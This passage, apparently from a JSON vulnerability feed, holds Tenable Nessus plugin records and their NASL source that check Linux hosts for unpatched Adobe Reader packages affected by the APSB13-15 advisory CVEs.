9.5.5 for bnc#819918(swampid#52449).\n\nMore information can be found on:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\n(CVE-2013-2549, CVE-2013-2550, CVE-2013-2718, CVE-2013-2719,\nCVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723,\nCVE-2013-2724, CVE-2013-2725, CVE-2013-2726, CVE-2013-2727,\nCVE-2013-2729, CVE-2013-2730, CVE-2013-2731, CVE-2013-2732,\nCVE-2013-2733, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736,\nCVE-2013-2737, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\nCVE-2013-3340, CVE-2013-3341, CVE-2013-3342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=819918\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://lists.opensuse.org/opensuse-updates/2013-06/msg00126.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb13-15.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-browser-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-cmaps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ja\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-ko\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_CN\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:acroread-fonts-zh_TW\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.2\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:12.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/06/13\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE12\\.2|SUSE12\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"12.2 / 12.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-9.5.5-3.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-browser-plugin-9.5.5-3.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-cmaps-9.4.1-3.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-fonts-ja-9.4.1-3.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-fonts-ko-9.4.1-3.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-fonts-zh_CN-9.4.1-3.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.2\", reference:\"acroread-fonts-zh_TW-9.4.1-3.12.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"acroread-9.5.5-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"acroread-browser-plugin-9.5.5-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"acroread-cmaps-9.4.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"acroread-fonts-ja-9.4.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"acroread-fonts-ko-9.4.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"acroread-fonts-zh_CN-9.4.1-4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE12.3\", reference:\"acroread-fonts-zh_TW-9.4.1-4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread\");\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:56", "bulletinFamily": "scanner", "description": "Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve\n\n - memory corruption vulnerabilities that could lead to code execution. (CVE-2013-2718 / CVE-2013-2719 / CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 / CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 / CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 / CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 / CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 / CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been blacklisted in the operating system. (CVE-2013-3342)", "modified": "2014-06-27T00:00:00", "id": "SUSE_ACROREAD-8571.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=66506", "published": "2013-05-19T00:00:00", "title": "SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 8571)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66506);\n script_version(\"$Revision: 1.8 $\");\n script_cvs_date(\"$Date: 2014/06/27 10:42:17 $\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2550\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3342\");\n\n script_name(english:\"SuSE 10 Security Update : Acrobat Reader (ZYPP Patch Number 8571)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Acrobat Reader has been updated to version 9.5.5.\n\nThe Adobe Advisory can be found at:\nhttps://www.adobe.com/support/security/bulletins/apsb13-15.html\n\nThese updates resolve\n\n - memory corruption vulnerabilities that could lead to\n code execution. (CVE-2013-2718 / CVE-2013-2719 /\n CVE-2013-2720 / CVE-2013-2721 / CVE-2013-2722 /\n CVE-2013-2723 / CVE-2013-2725 / CVE-2013-2726 /\n CVE-2013-2731 / CVE-2013-2732 / CVE-2013-2734 /\n CVE-2013-2735 / CVE-2013-2736 / CVE-2013-3337 /\n CVE-2013-3338 / CVE-2013-3339 / CVE-2013-3340 /\n CVE-2013-3341)\n\n - an integer underflow vulnerability that could lead to\n code execution. (CVE-2013-2549)\n\n - a use-after-free vulnerability that could lead to a\n bypass of Adobe Reader's sandbox protection.\n (CVE-2013-2550)\n\n - an information leakage issue involving a JavaScript API.\n (CVE-2013-2737)\n\n - a stack overflow vulnerability that could lead to code\n execution. (CVE-2013-2724)\n\n - buffer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2730 / CVE-2013-2733)\n\n - integer overflow vulnerabilities that could lead to code\n execution. (CVE-2013-2727 / CVE-2013-2729)\n\n - a flaw in the way Reader handles domains that have been\n blacklisted in the operating system. (CVE-2013-3342)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2549.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2550.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2718.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2719.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2720.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2721.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2722.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2723.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2724.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2725.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2726.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2727.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2729.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2730.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2731.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2732.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2733.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2734.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2735.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2736.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-2737.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3337.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3338.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3339.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3340.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3341.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-3342.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8571.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'AdobeCollabSync Buffer Overflow Adobe Reader X Sandbox Bypass');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2014 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-9.5.5-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-cmaps-9.4.6-0.6.63\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-fonts-ja-9.4.6-0.6.63\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-fonts-ko-9.4.6-0.6.63\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-fonts-zh_CN-9.4.6-0.6.63\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"acroread-fonts-zh_TW-9.4.6-0.6.63\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:55", "bulletinFamily": "scanner", "description": "Updated acroread packages that fix multiple security issues are now available for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having critical security impact. Common Vulnerability Scoring System (CVSS) base scores, which give detailed severity ratings, are available for each vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable Document Format (PDF).\n\nThis update fixes multiple security flaws in Adobe Reader. These flaws are detailed in the Adobe Security bulletin APSB13-15, listed in the References section. A specially crafted PDF file could cause Adobe Reader to crash or, potentially, execute arbitrary code as the user running Adobe Reader when opened. (CVE-2013-2549, CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2724, CVE-2013-2725, CVE-2013-2726, CVE-2013-2727, CVE-2013-2729, CVE-2013-2730, CVE-2013-2731, CVE-2013-2732, CVE-2013-2733, CVE-2013-2734, CVE-2013-2735, CVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339, CVE-2013-3340, CVE-2013-3341)\n\nThis update also fixes an information leak flaw in Adobe Reader.\n(CVE-2013-2737)\n\nAll Adobe Reader users should install these updated packages. They contain Adobe Reader version 9.5.5, which is not vulnerable to these issues. All running instances of Adobe Reader must be restarted for the update to take effect.", "modified": "2018-11-26T00:00:00", "id": "REDHAT-RHSA-2013-0826.NASL", "href": "https://www.tenable.com/plugins/index.php?view=single&id=66458", "published": "2013-05-16T00:00:00", "title": "RHEL 5 / 6 : acroread (RHSA-2013:0826)", "type": "nessus", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Red Hat Security Advisory RHSA-2013:0826. The text \n# itself is copyright (C) Red Hat, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66458);\n script_version(\"1.19\");\n script_cvs_date(\"Date: 2018/11/26 11:02:15\");\n\n script_cve_id(\"CVE-2013-2549\", \"CVE-2013-2718\", \"CVE-2013-2719\", \"CVE-2013-2720\", \"CVE-2013-2721\", \"CVE-2013-2722\", \"CVE-2013-2723\", \"CVE-2013-2724\", \"CVE-2013-2725\", \"CVE-2013-2726\", \"CVE-2013-2727\", \"CVE-2013-2729\", \"CVE-2013-2730\", \"CVE-2013-2731\", \"CVE-2013-2732\", \"CVE-2013-2733\", \"CVE-2013-2734\", \"CVE-2013-2735\", \"CVE-2013-2736\", \"CVE-2013-2737\", \"CVE-2013-3337\", \"CVE-2013-3338\", \"CVE-2013-3339\", \"CVE-2013-3340\", \"CVE-2013-3341\", \"CVE-2013-3346\");\n script_bugtraq_id(58398, 59851);\n script_xref(name:\"RHSA\", value:\"2013:0826\");\n\n script_name(english:\"RHEL 5 / 6 : acroread (RHSA-2013:0826)\");\n script_summary(english:\"Checks the rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Red Hat host is missing one or more security updates.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated acroread packages that fix multiple security issues are now\navailable for Red Hat Enterprise Linux 5 and 6 Supplementary.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nAdobe Reader allows users to view and print documents in Portable\nDocument Format (PDF).\n\nThis update fixes multiple security flaws in Adobe Reader. These flaws\nare detailed in the Adobe Security bulletin APSB13-15, listed in the\nReferences section. A specially crafted PDF file could cause Adobe\nReader to crash or, potentially, execute arbitrary code as the user\nrunning Adobe Reader when opened. (CVE-2013-2549, CVE-2013-2718,\nCVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722,\nCVE-2013-2723, CVE-2013-2724, CVE-2013-2725, CVE-2013-2726,\nCVE-2013-2727, CVE-2013-2729, CVE-2013-2730, CVE-2013-2731,\nCVE-2013-2732, CVE-2013-2733, CVE-2013-2734, CVE-2013-2735,\nCVE-2013-2736, CVE-2013-3337, CVE-2013-3338, CVE-2013-3339,\nCVE-2013-3340, CVE-2013-3341)\n\nThis update also fixes an information leak flaw in Adobe Reader.\n(CVE-2013-2737)\n\nAll Adobe Reader users should install these updated packages. They\ncontain Adobe Reader version 9.5.5, which is not vulnerable to these\nissues. All running instances of Adobe Reader must be restarted for\nthe update to take effect.\"\n );\n # http://www.adobe.com/support/security/bulletins/apsb13-15.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.adobe.com/support/security/bulletins/apsb13-15.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/errata/RHSA-2013:0826\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3340\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2719\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2718\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2735\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2734\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2737\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2736\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2731\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2730\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2733\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2732\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3341\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2549\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2729\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2726\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2727\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2724\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2725\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2722\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2723\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2720\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-2721\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3338\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3339\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3337\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://access.redhat.com/security/cve/cve-2013-3346\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected acroread and / or acroread-plugin packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Adobe Reader ToolButton Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_canvas\", value:\"true\");\n script_set_attribute(attribute:\"canvas_package\", value:'CANVAS');\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:redhat:enterprise_linux:acroread-plugin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:5.9\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:redhat:enterprise_linux:6.4\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/05/15\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/05/16\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Red Hat Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Red Hat\" >!< release) audit(AUDIT_OS_NOT, \"Red Hat\");\nos_ver = eregmatch(pattern: \"Red Hat Enterprise Linux.*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^(5\\.9|6)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Red Hat 5.9 / 6.x\", \"Red Hat \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"s390\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Red Hat\", cpu);\n\nyum_updateinfo = get_kb_item(\"Host/RedHat/yum-updateinfo\");\nif (!empty_or_null(yum_updateinfo)) \n{\n rhsa = \"RHSA-2013:0826\";\n yum_report = redhat_generate_yum_updateinfo_report(rhsa:rhsa);\n if (!empty_or_null(yum_report))\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : yum_report \n );\n exit(0);\n }\n else\n {\n audit_message = \"affected by Red Hat security advisory \" + rhsa;\n audit(AUDIT_OS_NOT, audit_message);\n }\n}\nelse\n{\n flag = 0;\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"acroread-9.5.5-1.el5_9\")) flag++;\n\n if (rpm_check(release:\"RHEL5\", sp:\"9\", cpu:\"i386\", reference:\"acroread-plugin-9.5.5-1.el5_9\")) flag++;\n\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"acroread-9.5.5-1.el6_4\")) flag++;\n\n if (rpm_check(release:\"RHEL6\", cpu:\"i686\", reference:\"acroread-plugin-9.5.5-1.el6_4\")) flag++;\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"acroread / acroread-plugin\");\n }\n}\n", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2019-02-21T01:18:54", "bulletinFamily": "scanner", "description": "The version of Adobe Reader installed on the remote Mac OS X host is prior to 11.0.3, 10.1.7, or 9.5.5. It is, therefore, affected by the following vulnerabilities :\n\n - Unspecified memory corruption issues exist that allow an attacker to execute arbitrary code. (CVE-2013-2718, CVE-2013-2719, CVE-2013-2720, CVE-2013-2721, CVE-2013-2722, CVE-2013-2723, CVE-2013-2725, CVE-2013-2726, CVE-2013-2731, CVE-2013-2732, CVE-2013-2734, 